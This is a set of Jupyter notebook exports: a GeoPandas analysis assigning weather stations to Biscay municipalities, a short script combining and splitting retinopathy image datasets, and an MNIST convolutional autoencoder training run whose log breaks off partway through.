###Markdown Challenge: Assigning Weather Stations to each Municipality **OBJECTIVE: We have 102 weather stations, and each of those stations must be assigned to one of the 112 Biscay Province Municipalities.** Note: a Weather station may share multiple Municipalities**Assumptions:*** We will take the center coordinates of each Municipality as a reference point, because it represents an average central position of the area.* We will use the Mercator projection (EPSG:25830) with coordinates in UTM because: - The client data is already in UTM; - Working in UTM will give distance results in meters directly; - This projection is good for large scale analysis**Note:** For more precision we could use the PlateCarree projection (EPSG:32663), designed specifically to preserve distances on a map.(This task is still pending and we would only see tiny differences in the absolute values, which from a Business perspective we do not require for this exercise). Rational / Engine The idea will be to use GeoPandas to solve this problem where we can use the library methods to calculate distances and iterate over them, thus avoiding to have to go through a very manual process and generate higher accuracy. We need:- 1) A **Geodataframe** with a geometry shapely object for the **Biscay Municipalities** (which we already have from Maps Exploration)- 2) **Geodataframe** with a geometry shapely object for the **Weather Stations** (we only have a CSV file with the weather stations UTM coordinates locations, so we will have to create our own Geodataframe)Start by importing the data. Biscay Province GDF / Shapefile **Load Map from Spain and Basque Country as it might be useful** ###Code # Municipality shapefile (that we can read as GeoDataFrame) that we have already worked with before to get the maps biscay_gdf = gpd.read_file('../../../Other_open_data/shapefiles/biscay/geodataframe_biscay_municipalities.shp') biscay_gdf.rename({"municipali":"municipality","code_munic":"code_municipality"}, axis=1, inplace=True) '''Add coordinates for center of Municipality and take it takes the average central point of the region This will be usd as the distance calculator (as recommended by JC)''' biscay_gdf["UTM_points"] = biscay_gdf.geometry.centroid #inspection of Biscay GDF biscay_gdf.info() ###Output <class 'geopandas.geodataframe.GeoDataFrame'> RangeIndex: 112 entries, 0 to 111 Data columns (total 4 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 municipality 112 non-null object 1 code_municipality 112 non-null object 2 geometry 112 non-null geometry 3 UTM_points 112 non-null geometry dtypes: geometry(2), object(2) memory usage: 3.6+ KB ###Markdown Weather Stations GDF / Shapefile ###Code # Load the stations CSV we have from client, we will need to work this into a GeoDataFrame stations_df = pd.read_csv("../../../Input_open_data/ds05_LOCALIZACION-ESTACIONES-METEOROLOGICAS.csv",sep=";") #Convert column names to lower case for practical reason stations_df.columns = stations_df.columns.str.lower() #Set index as Stations, Station Code and Station type and because it will be useful to get the closest municipality stations_df.set_index(["estacion","codigo","tipo"], inplace=True) ###Output _____no_output_____ ###Markdown Now create a new column that will use the Point method from package shapely.geometry ###Code stations_df["UTM_points"] = [Point(x, y) for x, y in zip(stations_df.xutm, stations_df.yutm)] ###Output _____no_output_____ ###Markdown Convert it to a Geodataframe so we can make our desired calculations(point distances). ###Code #Create a GeoDataFrame that can be saved as Shapefile and Inspect it stations_gdf = gpd.GeoDataFrame(stations_df, crs="EPSG:25830", geometry=stations_df.UTM_points) stations_gdf.info() ###Output <class 'geopandas.geodataframe.GeoDataFrame'> MultiIndex: 102 entries, ('Abetxuko', 'C076', 'A') to ('Zizurkil', 'C029', 'M') Data columns (total 5 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 xutm 102 non-null int64 1 yutm 102 non-null int64 2 cota (m) 102 non-null int64 3 UTM_points 102 non-null object 4 geometry 102 non-null geometry dtypes: geometry(1), int64(3), object(1) memory usage: 14.3+ KB ###Markdown Quick Data Visualization of Weather Stations vs Municipalities Plot the 2 Geodataframes to get an image of how many Meteo Stations from our dataset we have that are located within the Biscay region.- We can clearly see that most meteo Stations lie outside the Biscay Province- We can confirm that only 30 stations are within the Biscay Province ###Code # Load Basque Country GDF / Shapefile so we can: # add texture to the map and it does not plot blank areas for Weather Stations that lie outside Biscay Province #Load Spain Map GeoDataframe & Set projection to UTM (same as we have in our map exploration) spain_provinces_gdf = gpd.read_file("../../../Other_open_data/shapefiles/spain/gadm36_ESP_2.shx") spain_provinces_gdf.to_crs("EPSG:25830",inplace=True) spain_provinces_gdf.set_crs("EPSG:25830",inplace=True) # Slice GeoDataframe for Basque Country only basque_country_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1 == "País Vasco",:] # Slice GeoDataFrame for surrounding regions (it gives nicer maps plots) surrounding_regions_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1.isin(["Cantabria","País Vasco","Castilla y León"]),:] ############################################################################################################## # Save the sliced GDFs to shapefiles that we can use later if needed for other maps explorations (only used 1) #basque_country_gdf.to_file("basque_country_UTM", driver='ESRI Shapefile') #surrounding_regions_gdf.to_file("cantabria_paisvasco_castillayleon_UTM", driver='ESRI Shapefile') # Create Basemap of Basque Country ax = basque_country_gdf.plot(figsize=(20, 20), zorder=2, color='gainsboro', edgecolor='#737373') # Add layer of Spain Map for more texture. spain_provinces_gdf.plot(zorder=1, color='White', edgecolor='#737373', ax=ax) # Create base map of Biscay Provinces biscay_gdf.geometry.plot(zorder=3, color='#ffffd4', edgecolor='#bf5b17', ax=ax) # Add wasp locations map stations_gdf.plot(label="Weather Stations location", color='#cc4c02', zorder=4, markersize=45, ax=ax) # Set legends ax.legend(loc='best', shadow=True, fontsize='xx-large', markerscale = 2) # Set axis titles ax.set_title('Location of Weather Stations within the Basque Country', pad = 20, fontdict={'fontsize':25, 'color': '#4873ab'}) ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16}) ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16}) ax.set_xlim(461500, 605000) ax.set_ylim(4700900, 4813000) ax.set_facecolor('#4292c6') plt.show() #plt.savefig('weather_stations_map.png') stations_gdf_clipped = gpd.clip(stations_gdf, biscay_gdf) # Create base map of Biscay Provinces ax = biscay_gdf.geometry.plot(figsize=(15, 15), zorder=1, color='#ffffcc', edgecolor='#bf5b17') # Add wasp locations map stations_gdf_clipped.plot(label="Weather Stations location", color='red', zorder=5, markersize=20, ax=ax) # Set axis titles ax.set_title('Weather Stations in the Biscay Province (YTD)', pad = 20, fontdict={'fontsize':20, 'color': '#4873ab'}) ax.set_xlabel('Longitude (UMT)') ax.set_ylabel('Latitude (UMT)') plt.show() ###Output _____no_output_____ ###Markdown The Actual Python Script Template to Assign Weather Stations Now that we have both GeoDataFrames we need to calculate the distance points using the .distance() method. We test it for the 1st Municipality in the Biscay geoDataFrame.1 ) For the first Municipality (Gordexola) in the Biscay Municipality GeoDataFrame (the 0 index position),2 ) We calculate the distances between all stations and find the Station index with the lowest value. ###Code stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"]) # From the output we confirm that it creates a series with distances for all stations for Gordexola (0 based index) municipality biscay_gordexola = stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"]).idxmin() biscay_gordexola #From the series we select the one with the minimum distance. #The output shows that the closest station for Gordexola is Soudpe-Herrerias. ###Output _____no_output_____ ###Markdown - **Now that we have the formula for 1 Municipality, we want to iterate through all municipalities so we don't have to go 1 by 1 though all 112.**- **We create a For Loop that will give the minimum distances for all Municipalities.** ###Code '''Create a for loop to iterate through each Minicipality. The loop is calculating: 1) the distance of each station for i0(Gordexola) and giving the index of the station where the distance is minimized, 2) then the distance of each station for i1(Gexto) and giving the index of the station where the distance is minimized 3) etc... until it reaches the end of the Municipality GeoDataFrame which has 1 unique Municipality as an Index''' closest_stations_list = [] for i in biscay_gdf.UTM_points: closest_stations_list.append(stations_gdf.geometry.distance(i).idxmin()) ''' IDEA TO CORRECT WEATHER STATIONS WITH MISSING VALUES: closest_stations_list = [] for i in biscay_gdf.UTM_points: closest_station_i = stations_gdf.geometry.distance(i).nsmallest(n=2,keep="first").index if closest_station_i[0][1] not in WBds02_METEO.csv.station_code.values: #######confirm/check this line closest_stations_list.append(closest_station_i[1]) else: closest_stations_list.append(closest_station_i[0]) ''' # Create a new series with the new list closest_stations_series = pd.Series(closest_stations_list,name="closest_station") # Add the newly created Series as a new column for each Municipality showing the closest station biscay_gdf["closest_station"] = closest_stations_series # Manually replace the station that does not exist in WBds02_METEO.csv # first find the index for the Municipality to assign a new station print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"]) # then extract the 2nd closest weather station biscay_zaratamo_48097 = stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index[1] biscay_basauri_48015 = stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index[1] biscay_galdakao_48036 = stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index[1] # then replace the value in the DataFrame to later save as a .csv file biscay_gdf.at[97,"closest_station"] = biscay_zaratamo_48097 biscay_gdf.at[23,"closest_station"] = biscay_basauri_48015 biscay_gdf.at[41,"closest_station"] = biscay_galdakao_48036 ###Output 97 POINT (510759.931 4783835.490) Name: UTM_points, dtype: geometry 23 POINT (509085.637 4786507.059) Name: UTM_points, dtype: geometry 41 POINT (513424.801 4786444.656) Name: UTM_points, dtype: geometry ###Markdown Use the same code to add a new column with the distance (for checking purposes). ###Code #Here the loop is calculating for each Municipality the distance of stations and giving the minimum distance only distance_stations_list = [] for i in biscay_gdf.UTM_points: distance_stations_list.append(round(stations_gdf.geometry.distance(i).min(),0)) ''' Need to check how to get min distance, maybe using the "closest station" column created previously and finding it in the stations_gdf ''' # Create a new series with the new list distance_stations_series = pd.Series(distance_stations_list,name="station_distance(meters)") # The newly created Series as a new column for each Municipality showing the closest station biscay_gdf["station_distance(meters)"] = distance_stations_series.astype(int) # Manually replace the station that does not exist in WBds02_METEO.csv # first find the index for the Municipality to assign a new station print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"]) # then extract the 2nd closest weather station biscay_zaratamo_48097_dis = round(stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2)[1],0) biscay_basauri_48015_dis = round(stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2)[1],0) biscay_galdakao_48036_dis = round(stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2)[1],0) # then replace the value in the DataFrame to later save as a .csv file biscay_gdf.at[97,"station_distance(meters)"] = biscay_zaratamo_48097_dis biscay_gdf.at[23,"station_distance(meters)"] = biscay_basauri_48015_dis biscay_gdf.at[41,"station_distance(meters)"] = biscay_galdakao_48036_dis ###Output 97 POINT (510759.931 4783835.490) Name: UTM_points, dtype: geometry 23 POINT (509085.637 4786507.059) Name: UTM_points, dtype: geometry 41 POINT (513424.801 4786444.656) Name: UTM_points, dtype: geometry ###Markdown Use the same code to add a new series with the number of stations that lie within each Municipality, using the .within() method. ###Code #Here the loop is calculating for each Municipality the sum of stations that are within the Municipality number_stations_list = [] for i in biscay_gdf.geometry: number_stations_list.append(stations_gdf.geometry.within(i).sum()) # Create a new series with the new list number_stations_series = pd.Series(number_stations_list,name="number_stations") # The newly created Series as a new column for each Municipality showing the closest station biscay_gdf["number_of_stations"] = number_stations_series ###Output _____no_output_____ ###Markdown Use the same code to add a new series with the coordinates of closest stations for each Municipality in order to map them and be able to check if the distances calculated seem correct. ###Code closest_stations_coords_list = [] for i in biscay_gdf.UTM_points: closest_stations_coords_list.append(stations_gdf.loc[stations_gdf.geometry.distance(i).idxmin(),"geometry"]) # Create a new series with the new list closest_stations_coords_series = gpd.GeoSeries(closest_stations_coords_list) # The newly created Series as a new column for each Municipality showing the closest station biscay_gdf["closest_station_UTM"] = closest_stations_coords_series # Manually replace the station that does not exist in WBds02_METEO.csv # first find the index for the Municipality to assign a new station print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"]) # then extract the 2nd closest weather station biscay_zaratamo_48097_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1] biscay_basauri_48015_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1] biscay_galdakao_48036_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1] # then replace the value in the DataFrame to later save as a .csv file biscay_gdf.at[97,"closest_station_UTM"] = biscay_zaratamo_48097_point biscay_gdf.at[23,"closest_station_UTM"] = biscay_basauri_48015_point biscay_gdf.at[41,"closest_station_UTM"] = biscay_galdakao_48036_point # check if the replaced values for C0B2 look to have worked properly biscay_gdf.loc[biscay_gdf.code_municipality.isin(["48097","48015","48036"]),:] ###Output _____no_output_____ ###Markdown Save CSV with new assigned Weather Stations for each MunicipalityFinally, save the csv file to upload to Github and keep the same current format by slicing and adapting current format layot. ###Code # Save file as CSV to replace WBds01_weather2municipality.csv # 1st) extract station_code to maintain same format as Github csv biscay_gdf.closest_station = biscay_gdf.closest_station.apply(str) station_code = biscay_gdf.closest_station.str.split(", ", n=3, expand=True) station_code = station_code.iloc[:,1].str.replace("'","") station_code = pd.Series(station_code, name="station_code") # insert station_code series in biscay_gdf biscay_gdf["station_code"] = station_code # rename municipality code column to maintain same format as csv file biscay_gdf.rename({"code_municipality":"municip_code"}, axis=1, inplace=True) # 2nd) create DataFrame that has the same format as the csv file in Github with the new stations assigned to a Municipality WBds01_weather2municipality = pd.DataFrame(data = biscay_gdf, columns= ["station_code","municip_code"]) WBds01_weather2municipality.sort_values(by="municip_code", ascending=True, inplace=True) # 3rd) save the new csv file WBds01_weather2municipality.to_csv("WBds01_GEO.csv", index=False) ###Output _____no_output_____ ###Markdown Double Check / Spot Mistakes Inspect the newly Created GDF and perform some checks ###Code biscay_gdf.info() biscay_gdf # run this and inspect df in Excel to spot if there are obvious mistakes #biscay_gdf.to_excel("weather_to_municp.xlsx", index=False) # if empty, then no municipality assigned to station C0B2 (which is not present in our METEO dataset) biscay_gdf.loc[biscay_gdf.station_code.str.contains("C0B2"),:] ###Output _____no_output_____ ###Markdown Plot the Result in a Map - Do a quick check to see if it is working correctly, ploting the distances in a map.- JC suggests to use it for EDA ###Code #Generate a new GDF with index as Municipalities to be able to groupby biscay_gdf2 = biscay_gdf.set_index("municipality") #Get the Closest Stations Geometry Coordinate Points station_points_gdf = biscay_gdf2.closest_station_UTM #Get the Municipality's average center Coordinate Points municipality_points_gdf = biscay_gdf2.UTM_points #Append in a new Dataframe to then groupby and generate using the Linestrings method #lines from Municipality center point to the Stations Point path_df = station_points_gdf.append(municipality_points_gdf) #Groupby Municipality and Get the LineString to have a path object path_df = path_df.groupby(by="municipality").apply(list).apply(lambda x: LineString(x)).reset_index() #Columns is empty so rename it to "geometry" path_df.rename({0:"geometry"},axis=1,inplace=True) #Set the geometry column as type Geometry & the CRS to "EPSG:25830" (same as other projections) path_gdf = gpd.GeoDataFrame(path_df, geometry=path_df.geometry) path_gdf.crs = "EPSG:25830" # Set basemaps ax = biscay_gdf.plot(figsize=(20, 20), zorder=2, color='#ffffd4', edgecolor='#bf5b17') surrounding_regions_gdf.plot(zorder=1, color='#f7f7f7', edgecolor='#737373', ax=ax) # Set results plots path_gdf.plot(label="Path to assigned Weather Station", zorder=2,linestyle='-', linewidth=1, ax=ax) municipality_points_gdf.plot(label="Municipality Center", color='green',markersize=20, zorder=3, ax=ax) stations_gdf.plot(label="Weather Stations", color='#cc4c02',markersize=40, zorder=4, ax=ax) # Set legends ax.legend(loc='upper left', shadow=True, fontsize='xx-large', markerscale = 2) # Set axis titles ax.set_title('Weather Stations assigned to Biscay Municipalities', pad = 20, fontdict={'fontsize':25, 'color': '#4873ab'}) ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16}) ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16}) ax.set_xlim(461500, 550000) ax.set_ylim(4757000, 4813000) ax.set_facecolor('#4292c6') plt.plot() #plt.savefig("assigned_weather_stations_map.png") ###Output _____no_output_____
dataprep/combine_datasets.ipynb
###Markdown Combining Data ###Code dataset = pd.DataFrame() dataset['path'] = images1 + '/' + df1['id_code'] + '.' + ext1 dataset['level'] = df1['diagnosis'] dataset.head() dataset2 = pd.DataFrame() dataset2['path'] = images2 + '/' + df2['image'] + '.' + ext2 dataset2['level'] = df2['level'] dataset2.head() dataset = dataset.append(dataset2, ignore_index=True) dataset['level'].value_counts() dataset = dataset.sort_values(by='level', ascending=False) dataset = dataset.head(dataset['level'].value_counts()[1]*2) dataset['level'].value_counts() ###Output _____no_output_____ ###Markdown Splitting ###Code from sklearn.model_selection import train_test_split train, test = train_test_split(dataset, test_size=0.25) train.head() BASE_PATH = "/mnt/Datasets/datasets/" train.to_csv(os.path.join(BASE_PATH, 'combined_train_split.csv'), index=False) test.to_csv(os.path.join(BASE_PATH, 'combined_test_split.csv'), index=False) ###Output _____no_output_____
Lab4/CE121_Lab4_02.ipynb
###Markdown CE-121 ###Code #Import scikit-learn dataset library from sklearn import datasets from sklearn import preprocessing from sklearn.tree import DecisionTreeClassifier import pandas as pd import numpy as np import matplotlib.pyplot as plt #Load dataset bcancer = datasets.load_breast_cancer() # print the names of the 30 features print("Features: ",bcancer.feature_names) # print the label type of cancer(malignant, benign) print("Labels: ",bcancer.target_names) # print data(feature)shape print("data shape: ",bcancer.data.shape) #print target shape print("target shape: ",bcancer.target.shape) print(bcancer.keys()) dataset = pd.DataFrame(bcancer.data, columns=[bcancer.feature_names]) #dataset['Target'] = pd.Series(data=bcancer.target, index=dataset.index) dataset['target']=bcancer.target print(dataset.tail()) y_enc=dataset.iloc[:,30] print(y_enc) le=preprocessing.LabelEncoder() y_enc=le.fit_transform(y_enc) print(y_enc) dataset=dataset.drop(['target'],axis=1) print(dataset.tail()) ohe=preprocessing.OneHotEncoder(dtype=np.int) x_enc=ohe.fit_transform(dataset) print(x_enc) print(ohe.get_feature_names(bcancer.feature_names)) print(len(ohe.get_feature_names(bcancer.feature_names))) from pandas.core.common import random_state #train test division(50%-50%) from sklearn.model_selection import train_test_split X_train, X_test, Y_train, Y_test = train_test_split(x_enc,y_enc, test_size = 0.50,random_state=121) print(X_train) #create DecisionTree model dtc=DecisionTreeClassifier(criterion="entropy",random_state=121,max_leaf_nodes=121) dtc.fit(X_train,Y_train) pred_op=dtc.predict(X_test) print("predicted output: ",pred_op) print("actual test output: ",Y_test) from sklearn import metrics print("Accuracy is :- ",metrics.accuracy_score(Y_test, pred_op)) from sklearn.metrics import precision_score from sklearn.metrics import recall_score precision = precision_score(Y_test, pred_op) recall = recall_score(Y_test, pred_op) print("precision :- ",precision) print("recall :- ",recall) # from sklearn.tree import export_graphviz # export_graphviz(dtc,out_file='tree_entropy.dot', # feature_names=ohe.get_feature_names(bcancer.feature_names),class_names=list(bcancer.target_names), # filled=True,max_depth=122) # #convert to png # from subprocess import call # call(['dot', '-Tpng', 'tree_entropy.dot', '-o', 'tree_entropy.png', '-Gdpi=600']) # # Display in python # import matplotlib.pyplot as plt # plt.figure(figsize = (14, 18)) # plt.imshow(plt.imread('tree_entropy.png')) # plt.axis('off'); # plt.show(); from sklearn.metrics import confusion_matrix confusion_matrix(Y_test, pred_op) disp = metrics.plot_confusion_matrix(dtc, X_test, Y_test) disp.figure_.suptitle("Confusion Matrix") print("Confusion matrix:\n",disp.confusion_matrix) plt.show() ###Output Confusion matrix: [[ 6 89] [ 3 187]]
content/blog/notebooks/2016/02/ssn-names.ipynb
###Markdown ReproduceIt is a series of articles that reproduce the results from data analysis articles focusing on having open data and open code. Today as small return for the [ReproduceIt series](http://danielfrg.com/tag/reproduceit.html) I try to reproduce a simple but nice data analysis and webapp that [braid.io](http://braid.io/) didcalled [Most Beyonces are 14 years old and most Kanyes are about 11](http://braid.io/tile/name-trends).The article analyses the trend of names of some music artits (Beyonce, Kanye and Madona) in the US, it also has some nice possible explanations for the ups and downs in time, its a quick read. The data is based on Social Security Office and can be downloaded from the [SSN website: Beyond the Top 1000 Names](https://www.ssa.gov/oact/babynames/limits.html)The data is very small and loading it into pandas and plotting using bokeh it was very easy. ###Code %matplotlib inline import pandas as pd import os data_dir = os.path.expanduser("~/data/names/names") files = os.listdir(data_dir) data = pd.DataFrame(columns=["year", "name", "sex", "occurrences"]) for fname in files: if fname.endswith(".txt"): fpath = os.path.join(data_dir, fname) df = pd.read_csv(fpath, header=None, names=["name", "sex", "occurrences"]) df["year"] = int(fname[3:7]) data = data.append(df) data.year = data.year.astype(int) data.head() data.shape data.dtypes ###Output _____no_output_____ ###Markdown BeyonceNow that the data is into a simple dataframe we can just filter by the name we want and make a Bar Chart. ###Code beyonce = data[data["name"] == "Beyonce"][["year", "occurrences"]] from bokeh.charts import ColumnDataSource, Bar, output_notebook, show from bokeh.models import HoverTool output_notebook() p = Bar(data=beyonce, label="year", values="occurrences", title="No. Babies named Beyoncé", color="#0277BD", ylabel='', tools="save,reset") show(p) ###Output _____no_output_____
chapter_2/ch2_autoencoder.ipynb
###Markdown Load MNIST dataset ###Code (ds_train, ds_test_), ds_info = tfds.load('mnist', split=['train', 'test'], shuffle_files=True, as_supervised=True, with_info=True) batch_size = 256 def preprocess(image, label): image = tf.cast(image, tf.float32) image = image/255. return image, image ds_train = ds_train.map(preprocess) ds_train = ds_train.cache() # put dataset into memory ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples) ds_train = ds_train.batch(batch_size) ds_test = ds_test_.map(preprocess).batch(batch_size).cache().prefetch(batch_size) # return label for testing def preprocess_with_label(image, label): image = tf.cast(image, tf.float32) image = tf.math.round(image/255.) return image, label ds_test_label = ds_test_.map(preprocess_with_label).batch(1000) ###Output _____no_output_____ ###Markdown Building Autoencoder ###Code def Encoder(z_dim): inputs = layers.Input(shape=[28,28,1]) x = inputs x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x) x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x) x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = Flatten()(x) out = Dense(z_dim)(x) return Model(inputs=inputs, outputs=out, name='encoder') def Decoder(z_dim): inputs = layers.Input(shape=[z_dim]) x = inputs x = Dense(7*7*64, activation='relu')(x) x = Reshape((7,7,64))(x) x = Conv2D(filters=64, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = UpSampling2D((2,2))(x) x = Conv2D(filters=32, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = UpSampling2D((2,2))(x) out = Conv2D(filters=1, kernel_size=(3,3), strides=1, padding='same', activation='sigmoid')(x) #return out return Model(inputs=inputs, outputs=out, name='decoder') class Autoencoder: def __init__(self, z_dim): self.encoder = Encoder(z_dim) self.decoder = Decoder(z_dim) model_input = self.encoder.input model_output = self.decoder(self.encoder.output) self.model = Model(model_input, model_output) autoencoder = Autoencoder(z_dim=10) model_path = "./models/autoencoder.h5" checkpoint = ModelCheckpoint(model_path, monitor= "val_loss", verbose=1, save_best_only=True, mode= "auto", save_weights_only = False) early = EarlyStopping(monitor= "val_loss", mode= "auto", patience = 5) callbacks_list = [checkpoint, early] autoencoder.model.compile( loss = "bce", optimizer=tf.keras.optimizers.RMSprop(learning_rate=3e-4)) #metrics=[tf.keras.losses.BinaryCrossentropy()]) autoencoder.model.fit(ds_train, validation_data=ds_test, epochs = 100, callbacks = callbacks_list) ###Output Epoch 1/100 235/235 [==============================] - ETA: 0s - loss: 0.2658 Epoch 00001: val_loss improved from inf to 0.18209, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 8ms/step - loss: 0.2658 - val_loss: 0.1821 Epoch 2/100 235/235 [==============================] - ETA: 0s - loss: 0.1691 Epoch 00002: val_loss improved from 0.18209 to 0.14860, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1691 - val_loss: 0.1486 Epoch 3/100 232/235 [============================>.] - ETA: 0s - loss: 0.1472 Epoch 00003: val_loss improved from 0.14860 to 0.13958, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1471 - val_loss: 0.1396 Epoch 4/100 227/235 [===========================>..] - ETA: 0s - loss: 0.1379 Epoch 00004: val_loss improved from 0.13958 to 0.13258, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1378 - val_loss: 0.1326 Epoch 5/100 230/235 [============================>.] - ETA: 0s - loss: 0.1325 Epoch 00005: val_loss improved from 0.13258 to 0.12724, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1324 - val_loss: 0.1272 Epoch 6/100 235/235 [==============================] - ETA: 0s - loss: 0.1287 Epoch 00006: val_loss improved from 0.12724 to 0.12569, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1287 - val_loss: 0.1257 Epoch 7/100 233/235 [============================>.] - ETA: 0s - loss: 0.1259 Epoch 00007: val_loss improved from 0.12569 to 0.12421, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1260 - val_loss: 0.1242 Epoch 8/100 234/235 [============================>.] - ETA: 0s - loss: 0.1237 Epoch 00008: val_loss improved from 0.12421 to 0.12303, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1237 - val_loss: 0.1230 Epoch 9/100 232/235 [============================>.] - ETA: 0s - loss: 0.1220 Epoch 00009: val_loss improved from 0.12303 to 0.12149, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1219 - val_loss: 0.1215 Epoch 10/100 234/235 [============================>.] - ETA: 0s - loss: 0.1205 Epoch 00010: val_loss improved from 0.12149 to 0.11844, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1205 - val_loss: 0.1184 Epoch 11/100 228/235 [============================>.] - ETA: 0s - loss: 0.1191 Epoch 00011: val_loss did not improve from 0.11844 235/235 [==============================] - 1s 6ms/step - loss: 0.1191 - val_loss: 0.1199 Epoch 12/100 233/235 [============================>.] - ETA: 0s - loss: 0.1180 Epoch 00012: val_loss improved from 0.11844 to 0.11633, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1180 - val_loss: 0.1163 Epoch 13/100 235/235 [==============================] - ETA: 0s - loss: 0.1170 Epoch 00013: val_loss improved from 0.11633 to 0.11440, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1170 - val_loss: 0.1144 Epoch 14/100 229/235 [============================>.] - ETA: 0s - loss: 0.1161 Epoch 00014: val_loss did not improve from 0.11440 235/235 [==============================] - 1s 6ms/step - loss: 0.1161 - val_loss: 0.1186 Epoch 15/100 232/235 [============================>.] - ETA: 0s - loss: 0.1154 Epoch 00015: val_loss did not improve from 0.11440 235/235 [==============================] - 1s 6ms/step - loss: 0.1153 - val_loss: 0.1145 Epoch 16/100 234/235 [============================>.] - ETA: 0s - loss: 0.1146 Epoch 00016: val_loss improved from 0.11440 to 0.11381, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1146 - val_loss: 0.1138 Epoch 17/100 234/235 [============================>.] - ETA: 0s - loss: 0.1140 Epoch 00017: val_loss did not improve from 0.11381 235/235 [==============================] - 1s 6ms/step - loss: 0.1140 - val_loss: 0.1139 Epoch 18/100 233/235 [============================>.] - ETA: 0s - loss: 0.1133 Epoch 00018: val_loss improved from 0.11381 to 0.11224, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1133 - val_loss: 0.1122 Epoch 19/100 234/235 [============================>.] - ETA: 0s - loss: 0.1127 Epoch 00019: val_loss improved from 0.11224 to 0.11138, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1127 - val_loss: 0.1114 Epoch 20/100 227/235 [===========================>..] - ETA: 0s - loss: 0.1122 Epoch 00020: val_loss improved from 0.11138 to 0.11081, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1122 - val_loss: 0.1108 Epoch 21/100 226/235 [===========================>..] - ETA: 0s - loss: 0.1118 Epoch 00021: val_loss improved from 0.11081 to 0.11079, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1118 - val_loss: 0.1108 Epoch 22/100 234/235 [============================>.] - ETA: 0s - loss: 0.1113 Epoch 00022: val_loss improved from 0.11079 to 0.11058, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1113 - val_loss: 0.1106 Epoch 23/100 232/235 [============================>.] - ETA: 0s - loss: 0.1109 Epoch 00023: val_loss improved from 0.11058 to 0.11040, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1109 - val_loss: 0.1104 Epoch 24/100 229/235 [============================>.] - ETA: 0s - loss: 0.1105 Epoch 00024: val_loss improved from 0.11040 to 0.10948, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1105 - val_loss: 0.1095 Epoch 25/100 230/235 [============================>.] - ETA: 0s - loss: 0.1101 Epoch 00025: val_loss did not improve from 0.10948 235/235 [==============================] - 1s 6ms/step - loss: 0.1101 - val_loss: 0.1119 Epoch 26/100 234/235 [============================>.] - ETA: 0s - loss: 0.1098 Epoch 00026: val_loss did not improve from 0.10948 235/235 [==============================] - 1s 6ms/step - loss: 0.1098 - val_loss: 